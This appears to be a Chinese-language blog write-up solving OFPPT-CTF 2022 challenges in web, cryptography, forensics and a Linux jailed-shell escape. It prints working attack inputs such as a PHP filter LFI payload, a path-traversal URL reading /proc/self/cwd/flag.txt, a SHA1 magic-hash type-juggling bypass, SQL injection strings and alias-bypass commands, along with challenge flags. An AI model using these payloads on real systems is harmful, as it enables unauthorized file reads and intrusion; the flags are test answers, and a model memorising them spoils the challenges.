OFPPT-CTF 2022 部分writeup

OFPPT-CTF 2022 部分writeup

OFPPT-CTF 2022 部分writeup_第1张图片

OFPPT-CTF 2022

  • OFPPT-CTF 2022 部分writeup
  • Web
    • Logs
    • easy web
    • LFI
    • library
    • Chocolate
    • php
  • Cryptography
    • Rome famous general
    • Milkshake
    • Transposition
  • Forensics
    • Shark
    • Windows memory dump
    • pcap analysis
    • pcap analysis 2
    • pcap analysis 3
    • pcap analysis 4
    • pcap analysis 5
    • pcap analysis 6
  • linux
    • Prison Break

本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!

Web

Logs

Our apache server is under attack. Thoses are the access logs of the server, can you find out what they are doing?

是apache日志
OFPPT-CTF 2022 部分writeup_第2张图片
最后这几段带ascii码的,可以翻过来得到flag

//FLAGIS:OFPPT-CTF{L0gs_r2v34l3d_SQL_1nj3ct10n}
%27+union+all+select+1%2CString.fromCharCode%2870%2c+76%2c+65%2c+71%2c+32%2c+73%2c+83%2c+32%2c+58%2c+32%2c+79%2c+70%2c+80%2c+80%2c+84%2c+45%2c+67%2c+84%2c+70%2c+123%2c+76%2c+48%2c+103%2c+115%2c+95%2c+114%2c+50%2c+118%2c+51%2c+52%2c+108%2c+51%2c+100%2c+95%2c+83%2c+81%2c+76%2c+95%2c+49%2c+110%2c+106%2c+51%2c+99%2c+116%2c+49%2c+48%2c+110%2c+125%29%2C3+--%2B

//youareontherighttrack
CHAR%28121%2C+111%2C+117%2C+32%2C+97%2C+114%2C+101%2C+32%2C+111%2C+110%2C+32%2C+116%2C+104%2C+101%2C+32%2C+114%2C+105%2C+103%2C+104%2C+116%2C+32%2C+116%2C+114%2C+97%2C+99%2C+107%29


//102 108 97 103 32 105 115 32 83 81 76 95 73 110 106 101 99 116 105 111 110
//flagisSQL_Injection
%27+union+all+select+1%2CString.fromCharCode%28102%2C+108%2C+97%2C+103%2C+32%2C+105%2C+115%2C+32%2C+83%2C+81%2C+76%2C+95%2C+73%2C+110%2C+106%2C+101%2C+99%2C+116%2C+105%2C+111%2C+110%29%2C3+--%2B

easy web

Can you find the flag in this website?

css里头
OFPPT-CTF 2022 部分writeup_第3张图片


LFI

Simple old-school LFI challenge. I know it’s Lame to see this kind of problems in real world now.
But what if we do!

OFPPT-CTF 2022 部分writeup_第4张图片
readme的地方就是LFI的地方
OFPPT-CTF 2022 部分writeup_第5张图片
扫描到robots.txt
OFPPT-CTF 2022 部分writeup_第6张图片
php伪协议读一下

/pages/page.php?f=php://filter/convert.base64-encode/resource=../somerandomtext/flag.php

OFPPT-CTF 2022 部分writeup_第7张图片


library

I created a file library in my website. I don’t have a lot of files, but take a look to the ones I have!

本题同https://ahmed-belkahla.me/post/csictf2020/?msclkid=7546b593aab011ecb605c6b48f5bdbae
OFPPT-CTF 2022 部分writeup_第8张图片
payload:

http://143.198.224.219:8888/getFile?file[]=../../&file[]=../../&file[]=../../&file[]=../../&file[]=../../proc/self/cwd/flag.txt&file[]=.&file[]=js

OFPPT-CTF 2022 部分writeup_第9张图片


Chocolate

My friend is only willing to eat chocolate. Any other food he rejects.

改个cookie
在这里插入图片描述

Cookie: flavour=Y2hvY29sYXRl

OFPPT-CTF 2022 部分writeup_第10张图片


php

This website is broken; it shows its php source code. Can you find a way to read the flag.



if (isset($_GET['hash'])) {
    if ($_GET['hash'] === "10932435112") {
        die('Not so easy mate.');
    }

    $hash = sha1($_GET['hash']);
    $target = sha1(10932435112);
    if($hash == $target) {
        include('flag.php');
        print $flag;
    } else {
        print "OFPPT-CTF{not-the-one}";
    }
} else {
    show_source(__FILE__);
}

?>

sha1(10932435112)=0e07766915004133176347055865026311692244

sha1加密后以0E开头:

  • sha1(‘aaroZmOk’)
  • sha1(‘aaK1STfY’)
  • sha1(‘aaO8zKZF’)
  • sha1(‘aa3OFF9m’)

payload:

/?hash=aaroZmOk

OFPPT-CTF 2022 部分writeup_第11张图片


Cryptography

Rome famous general

We received an anonymous encrypted message. Can you help us decrypt this text? LRMMS-PSR{d3x3h_p43q4o_p1my3o}
it says you have to use a key: cipherkey

是Keyed Caesar
OFPPT-CTF 2022 部分writeup_第12张图片
OFPPT-CTF{k3y3d_c43s4r_c1ph3r}


Milkshake

4e3255334e5449784d6a45794e54566a4e7a49794e5463314e474d334f444d774e3249315a6a51334e6a497a4d4463794e6a59334e5451304e47553d
↓
转ASCII
↓
N2U3NTIxMjEyNTVjNzIyNTc1NGM3ODMwN2I1ZjQ3NjIzMDcyNjY3NTQ0NGU=
↓
base64
↓
7e752121255c7225754c78307b5f476230726675444e
↓
转ASCII
↓
~u!!%\r%uLx0{_Gb0rfuDN
↓
ROT47
↓
OFPPTCTF{I_L0v3_C7Fs}

OFPPT-CTF 2022 部分writeup_第13张图片
OFPPT-CTF{I_L0v3_C7Fs}


Transposition

This one includes a transposition:
OFi3FntcP31_P1$sT_o4-_nCCl_4TscsF11c{pTRrh44n3s10rpl0}s

图片提示rail,Rail fence在线工具:www.boxentriq.com/code-breaking/rail-fence-cipher
OFPPT-CTF 2022 部分writeup_第14张图片

OFPPT-CTF{R41l_F3nc3_1s_4_Cl4ss1c_Tr4ns0p0sit1$on_c1ph3r}


Forensics

Shark

这题好坑,本来看http流以为是winrm解密​,查了好多资料
然后发现tcp.stream eq 5
OFPPT-CTF 2022 部分writeup_第15张图片
解密一下即可
OFPPT-CTF 2022 部分writeup_第16张图片
OFPPT-CTF{4lw4ys_F0110w_th3_str34m}


Windows memory dump

A Windows computer has been infected. The attacker managed to exploit a portion of a database backup that contains sensitive employee and customer private information. All memory dump challenges use the same file.
Inspect the memory dump and tell us the Windows Major Operating System Version, bit version, and the image date/time (UTC, no spaces or special characters). Submit the flag as OFPPT-CTF{OS_BIT_YYYYMMDDhhmmss}. Example: OFPPT-CTF{WindowsXP_32_20220120095959} File: 1.5 GB Decompressed: 5 GB

win10内存镜像要用vol3


pcap analysis

We need YOU to help us analyze the packet capture. Look for relevant data to the potential attempted hack. To gather some information on the victim, investigate the victim’s computer activity. The “victim” was using a search engine to look up a name. Provide the name with standard capitalization: OFPPT-CTF{Terry_Stewart}. Download zip SHA1: b56857a89592bc1b66ce59181c86e5ceb56da1df Zip file password: 0FPP7C7F NOTE: Next pcap analysis challenges use this PCAP file.

用百度搜的,百度关键词wd,他搜了不少东西,都试试
OFPPT-CTF 2022 部分writeup_第17张图片

OFPPT-CTF{charles_geschickter}

这里可以确认受害者IP:192.168.100.106
攻击者IP:192.168.100.103

pcap analysis 2

After hacking the victim’s computer, the attacker downloaded several files, including two binaries with identical names, but with different extensions: .exe and .bin (a Windows binary and a Linux binary, respectively).
What are the MD5 hashes of the two tool programs? Submit both hashes as the flag, separated by a ‘|’: OFPPT-CTF{ExeMD5|BinMD5} Use the PCAP file from ‘pcap analysis’ challenge.

retr是ftp的下载命令,根据提示是这两个
OFPPT-CTF 2022 部分writeup_第18张图片
找出传输文件的tcp流,选择原始数据,另存为即可

RETR /TOOLS/lytton-crypt.bin

OFPPT-CTF 2022 部分writeup_第19张图片

RETR /TOOLS/lytton-crypt.exe

OFPPT-CTF 2022 部分writeup_第20张图片
在这里插入图片描述

OFPPT-CTF{9cb9b11484369b95ce35904c691a5b28|4da8e81ee5b08777871e347a6b296953}


pcap analysis 3

The attacker cracked a password belonging to the victim. Submit the flag as: OFPPT-CTF{password}.
Use the PCAP file from ‘pcap analysis’ challenge.

攻击者在爆破ftp
OFPPT-CTF 2022 部分writeup_第21张图片
爆破成功,得到密码
OFPPT-CTF 2022 部分writeup_第22张图片

USER cgeschickter
331 Password required
PASS darkangel
230 User logged in.

cgeschickter用户也与第一题呼应


pcap analysis 4

The attacker made a fatal mistake, and in doing so, gave control of his computer to… someone. he shouldn’t have run that malicious program.
What is the hash md5 of the program? Submit the flag as: OFPPT-CTF{MD5_HASH}. Use the PCAP file from ‘pcap analysis’ challenge.

OFPPT-CTF 2022 部分writeup_第23张图片
OFPPT-CTF 2022 部分writeup_第24张图片
OFPPT-CTF 2022 部分writeup_第25张图片


pcap analysis 5

The attacker started by performing a port scan of the victim computer.
Identify the open TCP ports discovered on the victim’s machine? Enter the flag as the open ports, separated by commas, no spaces, in numerical order. Disregard port numbers > 10000. Example: OFPPT-CTF{80,110,111,143,443,2049} Use the PCAP file from ‘pcap analysis’ challenge.

根据提供的信息过滤一下

ip.src==192.168.100.103 && ip.dst==192.168.100.106 && tcp && frame.len==74

OFPPT-CTF 2022 部分writeup_第26张图片
将info导入excel筛选一下
OFPPT-CTF 2022 部分writeup_第27张图片

OFPPT-CTF{21,135,139,445,3389}


pcap analysis 6

The attacker might have just bit off more than he can chew! he encountered a competitor that is counter-attacking his system!
The competitor executed a command to attain persistence on the attacker’s computer. This command will allow the adversary to regain a connection to the computer even after reboot. What is the packet number where this command was executed? For example: OFPPT-CTF{93721}. Use the PCAP file from ‘pcap analysis’ challenge.

什么黑客大战,燃起来了
OFPPT-CTF 2022 部分writeup_第28张图片
本来以为是stream的数,猜了半天怎么不对,后来发现是数据包号
OFPPT-CTF{160468}


linux

Prison Break

OFPPT-CTF 2022 部分writeup_第29张图片
笑死我好多命令被屏蔽了
看一看当前运行的进程

ps -ef

UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 Mar23 ?        00:00:00 /usr/sbin/xinetd -dontfork
ctf          553       1  0 Mar23 ?        00:00:00 sh /ctf/start.sh
ctf          554     553  0 Mar23 ?        00:00:00 /bin/bash script.sh
ctf          558     554  0 Mar23 ?        00:00:00 bash
ctf          561       1  0 Mar23 ?        00:00:00 sh /ctf/start.sh
ctf          562     561  0 Mar23 ?        00:00:00 /bin/bash script.sh
ctf          568     562  0 Mar23 ?        00:00:00 /usr/bin/script -qc /bin/bash /dev/null
ctf          569     568  0 Mar23 pts/0    00:00:00 sh -c /bin/bash
ctf          570     569  0 Mar23 pts/0    00:00:00 /bin/bash
ctf          642       1  0 03:02 ?        00:00:00 sh /ctf/start.sh
ctf          643     642  0 03:02 ?        00:00:00 /bin/bash script.sh
ctf          723       1  0 05:03 ?        00:00:00 sh /ctf/start.sh
ctf          724     723  0 05:03 ?        00:00:00 /bin/bash script.sh
ctf          934       1  0 08:14 ?        00:00:00 sh /ctf/start.sh
ctf          935     934  0 08:14 ?        00:00:00 /bin/bash script.sh
ctf          955     935  0 08:16 ?        00:00:00 ps -ef

试了试发现nl命令还可以读文件,读/ctf/start.sh和script.sh

OFPPT-CTF 2022 部分writeup_第30张图片
start.sh

     1  #! /bin/sh

     2  cd /ctf
     3  /bin/bash script.sh

script.sh

     1  shopt -s expand_aliases
     2  alias cat="cowsay Don\'t look at me, I\'m just here to say moo."
     3  alias ls="cowsay Don\'t look at me, I\'m just here to say moo."
     4  alias grep="cowsay Don\'t look at me, I\'m just here to say moo."
     5  alias awk="cowsay Don\'t look at me, I\'m just here to say moo."
     6  alias pwd="cowsay Don\'t look at me, I\'m just here to say moo."
     7  alias cd="cowsay Don\'t look at me, I\'m just here to say moo."
     8  alias head="cowsay Don\'t look at me, I\'m just here to say moo."
     9  alias tail="cowsay Don\'t look at me, I\'m just here to say moo."
    10  alias less="cowsay Don\'t look at me, I\'m just here to say moo."
    11  alias more="cowsay Don\'t look at me, I\'m just here to say moo."
    12  alias sed="cowsay Don\'t look at me, I\'m just here to say moo."
    13  alias find="cowsay Don\'t look at me, I\'m just here to say moo."
    14  alias awk="cowsay Don\'t look at me, I\'m just here to say moo."

    15  while :
    16  do
    17      echo "user @ csictf: $ "
    18      read input
    19      eval $input 2>/dev/null
    20  done

后来想了想linux有不少对应绕过方法

l""s
nl flag.txt

OFPPT-CTF 2022 部分writeup_第31张图片
OFPPT-CTF{Pr1s0n_sh3ll_3sc4p3d}

本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!

你可能感兴趣的:(ctf,ctf,web)